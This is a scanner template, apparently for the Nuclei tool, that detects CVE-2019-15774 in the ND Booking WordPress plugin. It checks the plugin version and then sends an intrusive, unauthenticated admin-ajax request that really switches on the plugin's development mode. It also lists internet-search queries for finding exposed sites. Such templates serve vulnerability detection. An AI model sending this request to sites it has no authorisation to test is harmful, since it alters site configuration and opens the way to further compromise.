id: CVE-2019-15774 info: name: ND Booking < 2.5 - Unauthenticated Options Change author: popcorn94 severity: medium description: | The Hotel Booking WordPress plugin ND Booking < 2.5 was affected by an Unauthenticated Options Change security vulnerability. impact: | Unauthenticated attackers can modify WordPress plugin options, potentially enabling development mode or altering plugin configuration to facilitate further attacks or compromise site functionality. remediation: | Update the ND Booking plugin to version 2.5 or later. reference: - https://wpscan.com/vulnerability/fb211b8b-5c32-40df-b197-bb51fc672b4b/ - https://blog.nintechnet.com/privilege-escalation-vulnerability-in-wordpress-nd-booking-plugin/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-15774 cwe-id: CWE-601 epss-score: 0.01731 epss-percentile: 0.75259 cpe: cpe:2.3:a:booking_project:booking:*:*:*:*:*:wordpress:*:* metadata: verified: true vendor: booking_project product: booking framework: wordpress shodan-query: http.html:"/wp-content/plugins/nd-booking" fofa-query: body="/wp-content/plugins/nd-booking/" publicwww-query: "/wp-content/plugins/nd-booking/" tags: cve,cve2019,wordpress,wp-plugin,nd-booking,intrusive,vkev,vuln flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/nd-booking/readme.txt" matchers: - type: dsl dsl: - "status_code == 200" - "contains(body, 'Booking WP plugin')" - compare_versions(version, '< 2.5') condition: and internal: true extractors: - type: regex part: body group: 1 name: version regex: - 'Stable tag: ([0-9.]+)' internal: true - raw: - | GET /wp-admin/admin-ajax.php?action=nd_booking_import_settings_php_function&nd_booking_value_import_settings=nd_booking_plugin_dev_mode%5Bnd_booking_option_value%5D1 HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word words: - "Updated option \"nd_booking_plugin_dev_mode\" with the same value." - "Updated option \"nd_booking_plugin_dev_mode\" with 1." condition: or - type: status status: - 200 # digest: 4a0a00473045022100b431baa17eefa6cb5883b1c5b70c1fa935dc8515415b561e72d04574cb22b65d022013683232bd6fa33ec5bc2b3241f593ac62b5600d38e3f82e5cd4fbc72a476ac9:922c64590222798bb761d5b6d8e72950